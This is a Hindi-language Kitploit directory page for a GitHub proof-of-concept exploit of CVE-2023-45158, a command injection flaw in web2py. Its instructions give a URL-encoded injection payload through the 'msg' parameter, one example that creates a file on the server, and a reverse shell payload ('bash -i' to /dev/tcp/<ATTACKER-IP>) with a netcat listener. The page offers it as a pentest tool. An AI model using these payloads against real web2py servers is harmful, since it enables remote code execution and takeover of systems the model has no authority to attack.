Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
Log in
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2023-45158 — CVE-2023-45158 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, जो web2py में एक कमांड इंजेक्शन भेद्यता है। क्राफ्टेड HTTP अनुरोधों के माध्यम से रिमोट कोड निष्पादन प्रदर्शित करता है, जिसमें फ़ाइल निर्माण और रिवर्स शेल पेलोड शामिल हैं। | Kitploit
उपकरण/GitHubGitHub/yifanzhg/cve-2023-45158
पेलोड जनरेशनभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगकमांड एंड कंट्रोल
GitHubyifanzhg/cve-2023-45158

CVE-2023-45158

CVE-2023-45158 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, जो web2py में एक कमांड इंजेक्शन भेद्यता है। क्राफ्टेड HTTP अनुरोधों के माध्यम से रिमोट कोड निष्पादन प्रदर्शित करता है, जिसमें फ़ाइल निर्माण और रिवर्स शेल पेलोड शामिल हैं।

रिपॉजिटरी देखें
4182 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2023-45158

चरण

  1. वेबसर्वर चलाएँ
cd web2py
python3 web2py.py
  1. अपना कमांड URL http://<IP-ADDRESS>:8000/hack?msg=%27%3B<YOUR-COMMAND>%3B%27 का उपयोग करके इंजेक्ट करें। <IP-ADDRESS> और <YOUR-COMMAND> को अपने मानों से बदलें।

उदाहरण

  1. सर्वर पर एक फ़ाइल बनाएँ

http://<IP-ADDRESS>:8000/hack?msg=%27%3Btouch%20hack%3B%27

  1. रिवर्स शेल

हमलावर की मशीन पर, nc -l 127.0.0.1 8080 चलाएँ

URL पर जाएँ http://<IP-ADDRESS>:8000/hack?msg=%27%3Bbash%20-i%20>%26/dev/tcp/<ATTACKER-IP>/8080%200>%26%201%3B%27। <ATTACKER-IP> को बदलें।

टूल डाउनलोड करें